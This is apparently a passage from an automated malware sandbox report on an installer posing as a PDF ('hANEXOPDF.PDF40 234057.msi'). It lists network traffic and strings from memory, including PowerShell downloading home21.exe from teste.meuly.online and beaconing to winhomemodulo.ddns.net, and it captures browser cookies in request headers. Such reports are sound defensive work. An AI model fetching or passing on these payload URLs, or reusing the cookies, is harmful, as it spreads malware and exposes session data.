no-corsSec-Fetch-Dest: imageReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=RTiVvdTA6ylkpQiO3Qeuu_aZDZp-W5AlG1VKBx0MgrcTLzo16l9hXh_WK6lnqgb6BKkShYlj0PI7fRd5QcYY_5ZnQ8V1elcZw8AJfid5Lix8wFh3hvAVpG5jX2dVMz6S3OckHTC9kNXXFZyVd6jv69Bm80go6kWRSoPEMU3kNSUezEV3Gnpwnzw
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=N38B606KuvB9WRsT-yTxhlOHWGUcIng9h7_SRWJ13OpV1dvKrWIOYVMOYm2OgFZRJ5DJuGD7e2aYkkeCSgenJMudJwIY0kz0O4czMIAcc3hBTYL7hG9IfiJTMRZ2zG68RIX16OYnDGQ6us9jKIJdkqq4ubTD9mnjNgMl0RYLw8dNAdsaLANi7X0gaNorCOQ
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=N38B606KuvB9WRsT-yTxhlOHWGUcIng9h7_SRWJ13OpV1dvKrWIOYVMOYm2OgFZRJ5DJuGD7e2aYkkeCSgenJMudJwIY0kz0O4czMIAcc3hBTYL7hG9IfiJTMRZ2zG68RIX16OYnDGQ6us9jKIJdkqq4ubTD9mnjNgMl0RYLw8dNAdsaLANi7X0gaNorCOQ
Source: global traffic	HTTP traffic detected: GET /widget/app/so?awwd=1&gm3=1&origin=https%3A%2F%2Fwww.google.com.br&cn=app&pid=1&spid=538&hl=en HTTP/1.1Host: ogs.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; OTZ=7630183_72_76_104100_72_446760; NID=515=N38B606KuvB9WRsT-yTxhlOHWGUcIng9h7_SRWJ13OpV1dvKrWIOYVMOYm2OgFZRJ5DJuGD7e2aYkkeCSgenJMudJwIY0kz0O4czMIAcc3hBTYL7hG9IfiJTMRZ2zG68RIX16OYnDGQ6us9jKIJdkqq4ubTD9mnjNgMl0RYLw8dNAdsaLANi7X0gaNorCOQ
Source: global traffic	HTTP traffic detected: GET /w2/ HTTP/1.1Host: winhomemodulo.ddns.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: chromecache_142.12.dr	String found in binary or memory: var gMb;_.iMb=function(a){return gMb("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.hMb(a),hashtag:"#GoogleDoodle"})};_.jMb=function(a){return gMb("https://twitter.com/intent/tweet",{text:a})};_.kMb=function(a,b){return gMb("mailto:",{subject:a,body:b})};_.hMb=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};gMb=function(a,b){var c=new _.Um,d;for(d in b)c.add(d,b[d]);a=new _.Mm(a);_.Sm(a,c);return a.toString()}; equals www.facebook.com (Facebook)
Source: chromecache_142.12.dr	String found in binary or memory: var gMb;_.iMb=function(a){return gMb("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.hMb(a),hashtag:"#GoogleDoodle"})};_.jMb=function(a){return gMb("https://twitter.com/intent/tweet",{text:a})};_.kMb=function(a,b){return gMb("mailto:",{subject:a,body:b})};_.hMb=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};gMb=function(a,b){var c=new _.Um,d;for(d in b)c.add(d,b[d]);a=new _.Mm(a);_.Sm(a,c);return a.toString()}; equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: teste.meuly.online
Source: global traffic	DNS traffic detected: DNS query: winhomemodulo.ddns.net
Source: global traffic	DNS traffic detected: DNS query: google.com.br
Source: global traffic	DNS traffic detected: DNS query: www.google.com.br
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com.br
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 0000000B.00000002.4115513838.000001A07E000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
Source: svchost.exe, 0000000B.00000002.4116613572.000001A07E0E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E218000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000B.00000002.4115694157.000001A07E084000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.4114351304.000001A07D302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.4115441197.000001A07DF32000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.4117967729.000001A07E11B000.00000004.00000020.00020000.00000000.sdmp, edb.log.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/gcmjk
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E218000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E218000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E24D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000B.00000002.4115694157.000001A07E0A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 0000000B.00000002.4115513838.000001A07E000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/gc
Source: qmgr.db.11.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fontawesome.io
Source: home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1862144445.00000000074B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: powershell.exe, 00000003.00000002.1859009151.0000000004D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/http/
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/SV
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1869307874.000000000A3F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/U
Source: powershell.exe, 00000003.00000002.1859009151.0000000005407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://teste.meuly.online
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://winhomemodulo.ddns.net/w2/openU
Source: powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1862144445.00000000074B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: home21.exe, 00000006.00000003.1862753592.0000000008060000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.borland.com/namespaces/Types
Source: home21.exe, 00000006.00000003.1862753592.0000000008060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
Source: home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.borland.com/rootpart.xml
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: home21.exe, 00000006.00000003.1862753592.0000000008060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: home21.exe, 00000006.00000003.1869307874.000000000D85E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
Source: powershell.exe, 00000003.00000002.1859009151.0000000004D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBzq
Source: powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1862144445.00000000074B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1859009151.0000000005545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chromecache_110.12.dr	String found in binary or memory: https://ogs.google.com.br/
Source: chromecache_110.12.dr	String found in binary or memory: https://ogs.google.com.br/widget/app/so
Source: svchost.exe, 0000000B.00000003.3490855209.000001A07E2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: chromecache_110.12.dr	String found in binary or memory: https://ssl.gstatic.com
Source: chromecache_146.12.dr	String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)
Source: chromecache_146.12.dr	String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2.png)
Source: powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teste.me
Source: powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teste.meulLRzq
Source: powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teste.meull
Source: powershell.exe, 00000003.00000002.1859009151.0000000005386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teste.meuly.onDfo
Source: powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1859009151.0000000005386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teste.meuly.online
Source: powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1859009151.0000000005386000.00000004.00000800.00020000.00000000.sdmp, hANEXOPDF.PDF40 234057.msi	String found in binary or memory: https://teste.meuly.online/xxx/home21.exe
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: chromecache_110.12.dr	String found in binary or memory: https://www.google.com.br/log?format
Source: chromecache_110.12.dr	String found in binary or memory: https://www.gstatic.com
Source: chromecache_110.12.dr	String found in binary or memory: https://www.gstatic.com/_/boq-one-google/_/r/
Source: chromecache_110.12.dr	String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.Q0faXsEYlg8.
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
